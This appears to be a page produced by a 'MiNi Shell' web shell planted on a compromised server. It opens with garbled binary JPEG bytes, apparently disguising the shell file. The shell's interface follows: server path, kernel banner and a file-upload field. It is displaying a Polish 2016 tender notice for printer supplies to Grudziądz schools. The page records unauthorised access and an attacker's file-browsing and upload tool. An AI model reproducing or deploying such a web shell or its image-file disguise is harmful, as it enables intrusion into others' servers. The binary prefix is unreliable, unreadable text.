JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16052-N-2016.html

<p class="kh_header"><b>Grudziądz: Dostawa materiałów eksploatacyjnych do drukarek dla Grupy Zakupowej organizowanej przez GPP Sp. z o.o. w 2016 roku</b><br>
<b>Numer ogłoszenia: 16052 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Grudziądzki Park Przemysłowy Sp. z o.o. , ul. Waryńskiego 32-36, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. +48 56 696 80 91 do 93, faks +48 56 4506103, +48 56 6968098.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek dla Grupy Zakupowej organizowanej przez GPP Sp. z o.o. w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek dla potrzeb niżej wymienionych jednostek mających siedzibę w Grudziądzu w roku 2016, sukcesywnie, zgodnie z bieżącym zapotrzebowaniem.

1.	Szkoła Podstawowa Nr 3	ul. Narutowicza 6
2.	Szkoła Podstawowa Nr 4	ul. Jaśminowa 2
3.	Szkoła Podstawowa Nr 5	ul. Sienkiewicza 24
4.	Szkoła Podstawowa Nr 9	ul. Forteczna 29
5.	Szkoła Podstawowa Nr 12	ul. Moniuszki 14
6.	Zespół Szkół Specjalnych	ul. Sikorskiego 42
7.	Szkoła Podstawowa Nr 15	ul. Bydgoska 24
8.	Szkoła Podstawowa Nr 16	ul. Kochanowskiego 19
9.	Szkoła Podstawowa Nr 18	ul. Dąbrówki 7
10.	Zespół Szkół Ogólnokształcących Nr 1	ul. Droga Mazurska 2
11.	Zespół Szkół Ogólnokształcących Nr 2	ul. Sobieskiego 12
12.	Zespół Szkół Ogólnokształcących Nr 3	ul. Korczaka 23
13.	Zespół Szkół Ogólnokształcących Nr 4	ul. Żeromskiego 8
14.	Zespół Szkół Ogólnokształcących Nr 5	ul. Nauczycielska 19
15.	Gimnazjum Nr 4	ul. Konarskiego 14
16.	Gimnazjum Nr 6	ul. Al. 23 Stycznia 30
17.	Gimnazjum Nr 7	ul. Mikołaja z Ryńska 6
18.	Gimnazjum Nr 8	ul. Legionów 2
19.	Gimnazjum Nr 9	ul. Paderewskiego 10
20.	I Liceum Ogólnokształcące	ul. Sienkiewicza 27
21.	II Liceum Ogólnokształcące	ul. Marcinkowskiego 10
22.	III Liceum Ogólnokształcące	ul. Legionów 2
23.	IV Liceum Ogólnokształcące	ul. Sobieskiego 12
24.	Zespół Szkół Budowlanych i Plastycznych	ul. Czarnieckiego 9
25.	Zespół Szkół Mechanicznych	ul. Hallera 31
26.	Dom Pomocy Społecznej	ul. Parkowa 12
27.	Zespół Szkół Rolniczych	ul. Lipowa 33
28.	Zespół Szkół Technicznych	ul. Hoffmanna 1-7
29.	Centrum Kształcenia Ustawicznego	ul. Legionów 2
30.	Centrum Kształcenia Praktycznego	ul. Czarnieckiego 5/7
31.	Zespół Placówek Młodzieżowych Bursa	ul. Hallera 37
32.	Specjalny Ośrodek Szkolno-Wychowawczy Nr 1	ul. Parkowa 25
33.	Specjalny Ośrodek Szkolno-Wychowawczy Nr 2	ul. Kasprowicza 4
34.	Poradnia Psychologiczno-Pedagogiczna	ul. Korczaka 23
35.	Ognisko Pracy Pozaszkolnej	ul. Chełmińska 104
36.	Centrum Pomocy Dziecku i Poradnictwa Rodzinnego	ul. Mikołaja z Ryńska 8
37.	Dom Dziennego Pobytu	ul. Piłsudskiego 111
38.	Przedszkole Miejskie Śródmieście	ul. Grobowa 15
39.	Przedszkole Miejskie Rządz	ul. Łęgi 17
40.	Przedszkole Miejskie Tarpno ul. Legionów 30
41.	Przedszkole Miejskie Mniszek	ul. Sportowców 2
42.	Przedszkole Miejskie Lotnisko	ul. Kustronia 6
43.	Przedszkole Miejskie Kopernik ul. Dworcowa 35
44.	Przedszkole Miejskie Kuntersztyn	ul. Piłsudskiego 31
45.	Centrum Kultury Teatr	ul. Teatralna 1

II. Szczegółowy opis przedmiotu zamówienia i wykaz ilościowy asortymentu został określony w załączniku nr 1 do ogłoszenia. 
III. Dostarczone materiały eksploatacyjne muszą być fabrycznie nowe, pełnowartościowe, wolne od usterek materiałowych i produkcyjnych, pochodzące z bieżącej produkcji. Materiały nie mogą być regenerowane, prefabrykowane, ponownie napełniane lub modyfikowane w jakikolwiek sposób.
IV. Zaoferowane materiały eksploatacyjne muszą być odpowiednie dla danego rodzaju sprzętu i w pełni z nim współpracować, umożliwiać wykorzystanie wszystkich funkcji technicznych, diagnostycznych i informacyjnych urządzeń drukujących, zarówno w czasie pracy stanowiskowej jak i w sieci informatycznej. Nie mogą powodować zgłaszania błędów i informacji urządzeń drukujących nie związanych z awarią techniczną. Muszą być jednoznacznie rozpoznawane przez urządzenia pobierające informacje z układu elektronicznego materiału eksploatacyjnego. 
V. Materiały eksploatacyjne muszą zapewniać pod względem technicznym i jakościowym właściwą i pełną eksploatację, bezawaryjność i żywotność urządzeń. 
VI. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych (zamienników), Wykonawca zobowiązuje się przejąć zobowiązania wynikające z gwarancji na urządzenia i pokrycie kosztów ewentualnych napraw, realizowanych z powodu uszkodzenia urządzeń z winy materiałów nie będących oryginalnymi. 
VII. W przypadku sprzętu na gwarancji - jeśli na skutek awarii urządzenia z winy zastosowania, w okresie ich przydatności dostarczonych przez Wykonawcę równoważnych materiałów eksploatacyjnych (zamienników) Zamawiający utraci gwarancję producenta urządzenia, Wykonawca przejmie wszystkie zobowiązania gwaranta dotyczące urządzenia na pozostały okres udzielonej gwarancji, bez zmiany jej warunków.
VIII. Przez materiały eksploatacyjne równoważne (zamienniki) Zamawiający rozumie materiały, kompatybilne ze sprzętem do którego jest zamówiony, których parametry fizyczne, techniczne, jakościowe, funkcjonalne i użytkowe takie jak na przykład temperatura topnienia tonera, temperatura utrwalenia, pojemność tuszu/tonera, wydajność i jakość wydruku są takie same bądź lepsze niż materiału oryginalnego, zalecanego przez producenta urządzeń drukujących.
IX. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, będzie zawierał odrębne umowy (łącznie 45 umów), z każdą z jednostek wskazanych powyżej. Wzór umowy, stanowi załącznik nr 3 do ogłoszenia.
X. Dostawy produktów będących przedmiotem postępowania będą dokonywane zgodnie z bieżącym zapotrzebowaniem poszczególnych jednostek do ich siedziby od dnia zawarcia umowy do 31 grudnia 2016 roku. 
XI. Składając wniosek o dopuszczenie do udziału w licytacji elektronicznej należy uzupełnić wszystkie wymagane dane oraz przedłożyć oświadczenia oraz wykaz dostaw zrealizowanych przez Wykonawcę (wzór na którym należy przedłożyć wymagane dokumenty znajduję się w załączniku nr 2 do ogłoszenia)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.19.21.13-6.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie lub wykonywanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: dostaw materiałów eksploatacyjnych do drukarek na łączną kwotę minimum 100 tys zł brutto w przeciągu ostatnich 3 lat. Zamawiający nie stawia szczegółowych wymagań dotyczących ilości jednostkowych dostaw. W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca przedłoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) głównych dostaw materiałów eksploatacyjnych do drukarek, wg wzoru stanowiącego Załącznik nr 2 do ogłoszenia z dowodami, że dostawy wykonane zostały należycie, a w odniesieniu do nadal wykonywanych dostaw ciągłych, że dostawy są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.aukcjegpp.grudziadz.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.gpp.grudziadz.pl/</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wymagania formalne: 1. W celu wzięcia udziału w licytacji należy zarejestrować się jako Wykonawca na Portalu MarketPlanet Oneplace na stronie https://oneplace.marketplanet.pl/web/panel?supplier=GPP Po dokonaniu rejestracji na wskazany adres e-mail zostanie przesłany login i hasło niezbędne do zalogowania. 2. Wykonawca przed przystąpieniem do licytacji musi zalogować się na stronie Platformy Zakupowej GPP i zaakceptować regulamin licytacji. 3. Licytacja elektroniczna odbywać się będzie na Platformie Zakupowej GPP pod adresem: www.aukcjegpp.grudziadz.pl 4. Rejestracja i udział w licytacji jest dla wykonawców bezpłatny. Wymagania techniczne: 1. komputer klasy PC, 2. system operacyjny: Windows 7, Vista, XP, Linux. Zalecany: Windows 7, 3. przepustowość łącza minimum: 64kbit/s, 4. przeglądarka internetowa: Internet Explorer od wersji 8.0 w wersjach wspieranych przez producenta oprogramowania Microsoft, Firefox od wersji 10.0 w wersjach wspieranych przez producenta oprogramowania Mozilla, 5. zalecana rozdzielczość: 1024 x 768, 6. komunikacja szyfrowana certyfikatem SSL..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Zamawiający ustalił cenę (brutto) wywoławczą na kwotę 172 000,00 zł 2.Krok postąpienia wynosi 200 zł (lub jego wielokrotność) co oznacza że ofertę prowadzącą należy przelicytować dokładnie o kwotę 200 złotych lub jej wielokrotność 3. W czasie trwania licytacji elektronicznej Wykonawcy, składają za pośrednictwem Internetu swoje oferty cenowe za pomocą formularza umieszczonego na stronie internetowej www.aukcjegpp.grudziadz.pl 4. Ofertę składa się w postaci elektronicznej. 5. Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. 6. Od momentu otwarcia do momentu zamknięcia licytacji, Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną. 7. Testowa licytacja elektroniczna rozpocznie się w dniu poprzedzającym termin właściwej licytacji o godz. 10:00 pod adresem www.aukcjegpp.grudziadz.pl. 8. Licytacji będzie podlegać łączna kwota brutto wykonania całego zamówienia..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 15 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 02.02.2016 godzina 08:00, miejsce: Grudziądzki Park Przemysłowy Sp. z o.o. ul. Waryńskiego 32-36 86-300 Grudziądz Biuro Zarządu (Sekretariat I piętro)..</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przesłania zaproszenia do składania ofert o godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Upływa w dniu otwarcia o godzinie 10:15</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zgodnie z załącznikiem nr 3 do ogłoszenia</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wniosek o dopuszczenie do udziału w licytacji elektronicznej należy złożyć w zamkniętej kopercie, z adnotacją Dostawa materiałów eksploatacyjnych do drukarek dla Grupy Zakupowej organizowanej przez GPP Sp. z o.o. w 2016 roku oraz oznaczeniem firmy składającej wniosek..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com